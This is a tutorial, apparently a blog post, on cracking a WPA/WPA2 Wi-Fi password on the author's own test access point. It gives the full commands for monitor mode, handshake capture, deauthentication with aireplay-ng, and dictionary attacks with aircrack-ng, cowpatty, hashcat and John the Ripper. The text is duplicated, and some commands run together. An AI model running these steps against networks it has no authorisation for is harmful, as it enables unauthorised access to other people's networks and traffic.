Let’s first set up the password of our access point here. Let’s say raaj:raj12345
We are good to go now and since the password has changed you obviously aren’t connected to the access point. Before going any further, let me throw out some theory now. In the previous article here we saw some background about monitor mode and Wlan interface. Let’s begin by putting our Wi-Fi adapter in monitor mode first.
Assuming that the Wi-Fi interface is Wlan0, the command is:
We are using the airmon module for this which comes with built-in Kali Linux. Next, we’ll have to scan for the access point (here, SSID=raaj). If you check your interfaces with the iwconfig command now you’d see your Wlan0 has been transformed to Wlan0mon. Good for us. Now we scan access points around us
This should start scanning for Access Points’ SSIDs and BSSIDs (Basic service set identifiers or simply a 48 bit MAC) around you. We see raaj in there too.
Now let us understand this screen first. On the top left you see CH 3 written. That is a Wi-Fi channel.
Definition: In layman terms, a Wi-Fi channel is a path on which Wi-Fi packets travel to and from your device to the access point.
A 2.4 GHz Wi-Fi uses 11 channels and a 5 GHz Wi-Fi uses 45 channels. Each channel may vary or depending on what the vendor may use– higher or lower channel size is possible but generally is under 100 MHz in width. Your Wi-Fi access point uses a specified channel to transmit data. This channel to transmit can be manually configured in access points. A Wi-Fi adapter, however, just like your FM receiver can tune to listen to any channel.
Analogy: Just like radio channels, a Wi-Fi adapter working on channel 3 (lets say a 60 MHz frequency) won’t listen to what’s happening on channel 6 (let’s say a 100 MHz frequency) until you tune it to listen to channel 6. But your Wi-Fi adapter/NIC is able to change its listening channel automatically. We’ll use airodump-ng to specify a channel later in this article.
Now that I have the target, I will capture a handshake.
Handshake: A handshake in Wi-Fi is a mechanism by which an access point authenticates a client to onboard it and use its services. The cool thing to note is that in a handshake, the pairwise master key (PMK) is not transferred in this handshake so you can’t directly grab the PMK otherwise it would be a major vulnerability. Rather, this handshake file has something called a message integrity check (MIC) which is a combination of your Wi-Fi passphrase, nonce (random numbers), SSID and some other keys.
Goal: Our goal is to capture this handshake file (.cap file), extract juicy information and brute force against the MIC to finally obtain a password. Since MIC is analogous to a hash in Wi-Fi, we need a dictionary to calculate hashes and compare against the value given in the handshake capture and confirm the password.
Since a handshake is happening on a channel, we can use the same channel to see what a handshake file looks like. But since this handshake only occurs when a user authenticates, we have to wait for a client to connect himself or deauthenticate the client and force him to connect (yeah, possible).
We saw in the above screenshot that “raaj” operates on channel 3 with a given BSSID. Let’s use airodump to capture a handshake file.
-c : channel
-w : name to save as
Now, while airodump would wait for a handshake, we can’t just sit quietly. We have to force a user to reauthenticate by deauthenticating him. It can be done by aireplay-ng like this:
And it seemed to have worked like magic as you can see the client has re-authenticated and we have a handshake! The file is saved as pwd-01.cap
For simplicity, I’ll rename it to “handshake.cap” and run aircrack-ng using a very long dictionary of millions of most common passwords and some passwords I created from the information about my target! Let’s call it dict.txt. And instead of millions let’s only add 5-10 passwords because we already know it and just have to demonstrate the attack!
So, the command is:
As evident below, we have the password thanks to aircrack.
The same method can be done using another well-known tool called cowpatty. Link here. During my testing, the “handshake.cap” got renamed to “wifi.cap” so don’t get confused.
-s: SSID
It worked like a charm!
For this next method, we would need to install hashcat first. It is the undisputed go-to tool when we talk about hash cracking. You can download it from here. In Kali Linux, hashcat is preinstalled with utilities as well. We would use the “cap2hccapx” script for this method.
hccapx: It is a custom format specifically developed for hashcat for usage on WPA and WPA2.
cap2hccapx would convert the .cap file to .hccapx and hashcat would be able to bruteforce against it.
We can do this by:
It is done. We now need to run hashcat to brute force this file:
-m : hash type. 2500= WPA/WPA2 hashes
Quiet simple.
The same can be done using john the ripper too. We just need to convert it into a standard john hash file. This can be done using the hcxpcapng tool like:
A gorgeous thing to observe here is the contents of the capture file! Juicy, isn’t it? Let’s use john to crack the hash now:
Thanks for reading.
We are good to go now and since the password has changed you obviously aren’t connected to the access point. Before going any further, let me throw out some theory now. In the previous article here we saw some background about monitor mode and Wlan interface. Let’s begin by putting our Wi-Fi adapter in monitor mode first.
Assuming that the Wi-Fi interface is Wlan0, the command is:
airmon-ng start wlan0We are using the airmon module for this which comes with built-in Kali Linux. Next, we’ll have to scan for the access point (here, SSID=raaj). If you check your interfaces with the iwconfig command now you’d see your Wlan0 has been transformed to Wlan0mon. Good for us. Now we scan access points around us
airodump-ng wlan0monThis should start scanning for Access Points’ SSIDs and BSSIDs (Basic service set identifiers or simply a 48 bit MAC) around you. We see raaj in there too.
Now let us understand this screen first. On the top left you see CH 3 written. That is a Wi-Fi channel.
Definition: In layman terms, a Wi-Fi channel is a path on which Wi-Fi packets travel to and from your device to the access point.
A 2.4 GHz Wi-Fi uses 11 channels and a 5 GHz Wi-Fi uses 45 channels. Each channel may vary or depending on what the vendor may use– higher or lower channel size is possible but generally is under 100 MHz in width. Your Wi-Fi access point uses a specified channel to transmit data. This channel to transmit can be manually configured in access points. A Wi-Fi adapter, however, just like your FM receiver can tune to listen to any channel.
Analogy: Just like radio channels, a Wi-Fi adapter working on channel 3 (lets say a 60 MHz frequency) won’t listen to what’s happening on channel 6 (let’s say a 100 MHz frequency) until you tune it to listen to channel 6. But your Wi-Fi adapter/NIC is able to change its listening channel automatically. We’ll use airodump-ng to specify a channel later in this article.
Now that I have the target, I will capture a handshake.
Handshake: A handshake in Wi-Fi is a mechanism by which an access point authenticates a client to onboard it and use its services. The cool thing to note is that in a handshake, the pairwise master key (PMK) is not transferred in this handshake so you can’t directly grab the PMK otherwise it would be a major vulnerability. Rather, this handshake file has something called a message integrity check (MIC) which is a combination of your Wi-Fi passphrase, nonce (random numbers), SSID and some other keys.
Goal: Our goal is to capture this handshake file (.cap file), extract juicy information and brute force against the MIC to finally obtain a password. Since MIC is analogous to a hash in Wi-Fi, we need a dictionary to calculate hashes and compare against the value given in the handshake capture and confirm the password.
Since a handshake is happening on a channel, we can use the same channel to see what a handshake file looks like. But since this handshake only occurs when a user authenticates, we have to wait for a client to connect himself or deauthenticate the client and force him to connect (yeah, possible).
We saw in the above screenshot that “raaj” operates on channel 3 with a given BSSID. Let’s use airodump to capture a handshake file.
airodump-ng wlan0mon -c3 --bssid 18:45:93:69:A5:19 -w pwd
-c : channel
-w : name to save as
Now, while airodump would wait for a handshake, we can’t just sit quietly. We have to force a user to reauthenticate by deauthenticating him. It can be done by aireplay-ng like this:
aireplay-ng --deauth 0 -a 18:45:93:69:A5:19 wlan0mon
And it seemed to have worked like magic as you can see the client has re-authenticated and we have a handshake! The file is saved as pwd-01.cap
Aircrack-ng
For simplicity, I’ll rename it to “handshake.cap” and run aircrack-ng using a very long dictionary of millions of most common passwords and some passwords I created from the information about my target! Let’s call it dict.txt. And instead of millions let’s only add 5-10 passwords because we already know it and just have to demonstrate the attack!
So, the command is:
aircrack-ng handshake.cap -w dict.txt
As evident below, we have the password thanks to aircrack.
cowpatty
The same method can be done using another well-known tool called cowpatty. Link here. During my testing, the “handshake.cap” got renamed to “wifi.cap” so don’t get confused.
cowpatty -r wifi.cap -f dict.txt -s raaj-s: SSID
It worked like a charm!
Hashcat
For this next method, we would need to install hashcat first. It is the undisputed go-to tool when we talk about hash cracking. You can download it from here. In Kali Linux, hashcat is preinstalled with utilities as well. We would use the “cap2hccapx” script for this method.
hccapx: It is a custom format specifically developed for hashcat for usage on WPA and WPA2.
cap2hccapx would convert the .cap file to .hccapx and hashcat would be able to bruteforce against it.
We can do this by:
cd /usr/share/hashcat-utils./cap2hccapx.bin /root/wifi.cap /root/wifi.hccapx
It is done. We now need to run hashcat to brute force this file:
hashcat -m 2500 wifi.hccapx dict.txt --show-m : hash type. 2500= WPA/WPA2 hashes
Quiet simple.
John The Ripper
The same can be done using john the ripper too. We just need to convert it into a standard john hash file. This can be done using the hcxpcapng tool like:
hcxpcapngtool --john hash.john wifi.cap
A gorgeous thing to observe here is the contents of the capture file! Juicy, isn’t it? Let’s use john to crack the hash now:
john --format=wpapsk --wordlist dict.txt hash.johnjohn --show hash.john
Thanks for reading.
